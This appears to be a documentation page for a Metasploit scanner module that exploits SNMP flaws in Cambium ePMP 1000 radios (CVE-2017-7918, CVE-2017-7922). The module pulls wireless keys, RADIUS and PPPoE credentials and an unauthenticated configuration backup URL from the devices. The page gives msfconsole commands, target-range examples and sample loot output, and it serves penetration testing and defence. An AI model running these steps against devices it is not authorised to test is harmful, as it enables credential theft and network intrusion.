Cambium ePMP 1000 SNMP Enumeration - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/snmp/epmp1000_snmp_loot metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cambium ePMP 1000 SNMP Enumeration
Module: auxiliary/scanner/snmp/epmp1000_snmp_loot
Source code: modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb
Disclosure date: -
Last modification time: 2020-06-11 13:09:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 161
List of CVEs: CVE-2017-7918, CVE-2017-7922

Cambium devices (ePMP, PMP, Force, & others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested on Cambium ePMP versions 3.5 & prior.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/snmp/epmp1000_snmp_loot
msf auxiliary(epmp1000_snmp_loot) > show options
    ... show and set options ...
msf auxiliary(epmp1000_snmp_loot) > set RHOSTS ip-range
msf auxiliary(epmp1000_snmp_loot) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(epmp1000_snmp_loot) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(epmp1000_snmp_loot) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(epmp1000_snmp_loot) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.

The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested on Cambium ePMP versions <=3.5.

Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the number of THREADS.

Verification Steps


  1. Do: use auxiliary/scanner/snmp/epmp1000_snmp_loot
  2. Do: set RHOSTS [IP]
  3. Do: set COMMUNTY [SNMP_COMMUNUTY_STRING]
  4. Do: run

Scenarios


msf > use auxiliary/scanner/snmp/epmp_snmp_loot
msf auxiliary(epmp_snmp_loot) > set rhosts 1.3.3.7
msf auxiliary(epmp_snmp_loot) > set COMMUNITY private
msf auxiliary(epmp_snmp_loot) > run

msf auxiliary(epmp1000_snmp_loot) > run

[*] Fetching System Information...

[+] 1.3.3.7
[+] SNMP System Name: Cambium
[+] SNMP System Description: Cambium
[+] Device UpTime: 0021:08:36:45
[+] U-boot version: U-Boot 9350_PX 1.1.4.e (Feb 24 2016 - 20:14:38)

[*] Fetching SNMP Information...

[+] SNMP read-only community name: public
[+] SNMP read-write community name: private
[+] SNMP Trap Community: cambiumtrap
[+] SNMP Trap Server IP Address: Null

[*] Fetching WIFI Information...

[+] Wireless Interface SSID: SSID
[+] Wireless Interface Encryption Key: secretkey
[+] Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): 2

[*] Fetching WIFI Radius Information...

[+] RADIUS server info:
[+] RADIUS server port: Null
[+] RADIUS server secret: Null
[+] Wireless Radius Username: cambium-station
[+] Wireless Radius Password: cambium

[*] Fetching Network PPPoE Information...

[+] Network PPPoE Service Name: temp
[+] Network PPPoE Username: username
[+] Network PPPoE Password: password

[+] 1.3.3.7 - Cambium ePMP loot saved at /root/.msf4/loot/20000000000003_default_1.3.3.7_snmp_loot_000001.txt
[+] 1.3.3.7 - Configuration backed-up for direct download at: http://1.3.3.7/dl/3.5_00000000000001.json
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/snmp/epmp1000_snmp_loot auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/snmp/epmp1000_snmp_loot

msf6 auxiliary(scanner/snmp/epmp1000_snmp_loot) > show info

       Name: Cambium ePMP 1000 SNMP Enumeration
     Module: auxiliary/scanner/snmp/epmp1000_snmp_loot
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Karn Ganeshen

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  COMMUNITY  public           yes       SNMP Community String
  RETRIES    1                yes       SNMP Retries
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      161              yes       The target port (UDP)
  THREADS    1                yes       The number of concurrent threads (max one per host)
  TIMEOUT    1                yes       SNMP Timeout
  VERSION    1                yes       SNMP Version <1/2c>

Description:
  Cambium devices (ePMP, PMP, Force, & others) can be administered 
  using SNMP. The device configuration contains IP addresses, keys, 
  and passwords, amongst other information. This module uses SNMP to 
  extract Cambium ePMP device configuration. On certain software 
  versions, specific device configuration values can be accessed using 
  SNMP RO string, even though only SNMP RW string should be able to 
  access them, according to MIB documentation. The module also 
  triggers full configuration backup, and retrieves the backup url. 
  The configuration file can then be downloaded without 
  authentication. The module has been tested on Cambium ePMP versions 
  3.5 & prior.

References:
  https://ipositivesecurity.com/2017/04/07/cambium-snmp-security-vulnerabilities/
  https://nvd.nist.gov/vuln/detail/CVE-2017-7918
  https://nvd.nist.gov/vuln/detail/CVE-2017-7922

Module Options


This is a complete list of options available in the scanner/snmp/epmp1000_snmp_loot auxiliary module:

msf6 auxiliary(scanner/snmp/epmp1000_snmp_loot) > show options

Module options (auxiliary/scanner/snmp/epmp1000_snmp_loot):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      161              yes       The target port (UDP)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

Advanced Options


Here is a complete list of advanced options supported by the scanner/snmp/epmp1000_snmp_loot auxiliary module:

msf6 auxiliary(scanner/snmp/epmp1000_snmp_loot) > show advanced

Module advanced options (auxiliary/scanner/snmp/epmp1000_snmp_loot):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   CHOST                                 no        The local client address
   CPORT                                 no        The local client port
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/snmp/epmp1000_snmp_loot module can do:

msf6 auxiliary(scanner/snmp/epmp1000_snmp_loot) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/snmp/epmp1000_snmp_loot auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/snmp/epmp1000_snmp_loot) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<IP> SNMP request timeout.


Here is a relevant code snippet related to the "<IP> SNMP request timeout." error message:

146:	      loot_desc     = 'Cambium ePMP configuration data'
147:	      p = store_loot(loot_name, loot_type, datastore['RHOST'], epmp_info, loot_filename, loot_desc)
148:	      print_good("Cambium ePMP loot saved at #{p}")
149:	
150:	    rescue SNMP::RequestTimeout
151:	      print_error("#{ip} SNMP request timeout.")
152:	    rescue Rex::ConnectionError
153:	      print_error("#{ip} Connection refused.")
154:	    rescue SNMP::InvalidIpAddress
155:	      print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
156:	    rescue SNMP::UnsupportedVersion

<IP> Connection refused.


Here is a relevant code snippet related to the "<IP> Connection refused." error message:

148:	      print_good("Cambium ePMP loot saved at #{p}")
149:	
150:	    rescue SNMP::RequestTimeout
151:	      print_error("#{ip} SNMP request timeout.")
152:	    rescue Rex::ConnectionError
153:	      print_error("#{ip} Connection refused.")
154:	    rescue SNMP::InvalidIpAddress
155:	      print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
156:	    rescue SNMP::UnsupportedVersion
157:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
158:	    rescue ::Interrupt

<IP> Invalid IP Address. Check it with 'snmpwalk tool'.


Here is a relevant code snippet related to the "<IP> Invalid IP Address. Check it with 'snmpwalk tool'." error message:

150:	    rescue SNMP::RequestTimeout
151:	      print_error("#{ip} SNMP request timeout.")
152:	    rescue Rex::ConnectionError
153:	      print_error("#{ip} Connection refused.")
154:	    rescue SNMP::InvalidIpAddress
155:	      print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
156:	    rescue SNMP::UnsupportedVersion
157:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
158:	    rescue ::Interrupt
159:	      raise $!
160:	    rescue ::Exception => e

<IP> Unsupported SNMP version specified. Select from '1' or '2c'.


Here is a relevant code snippet related to the "<IP> Unsupported SNMP version specified. Select from '1' or '2c'." error message:

152:	    rescue Rex::ConnectionError
153:	      print_error("#{ip} Connection refused.")
154:	    rescue SNMP::InvalidIpAddress
155:	      print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
156:	    rescue SNMP::UnsupportedVersion
157:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
158:	    rescue ::Interrupt
159:	      raise $!
160:	    rescue ::Exception => e
161:	      print_error("Unknown error: #{e.class} #{e}")
162:	      elog(e)

Unknown error: <E.CLASS> <E>


Here is a relevant code snippet related to the "Unknown error: <E.CLASS> <E>" error message:

156:	    rescue SNMP::UnsupportedVersion
157:	      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
158:	    rescue ::Interrupt
159:	      raise $!
160:	    rescue ::Exception => e
161:	      print_error("Unknown error: #{e.class} #{e}")
162:	      elog(e)
163:	    ensure
164:	      disconnect_snmp
165:	    end
166:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Karn Ganeshen

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.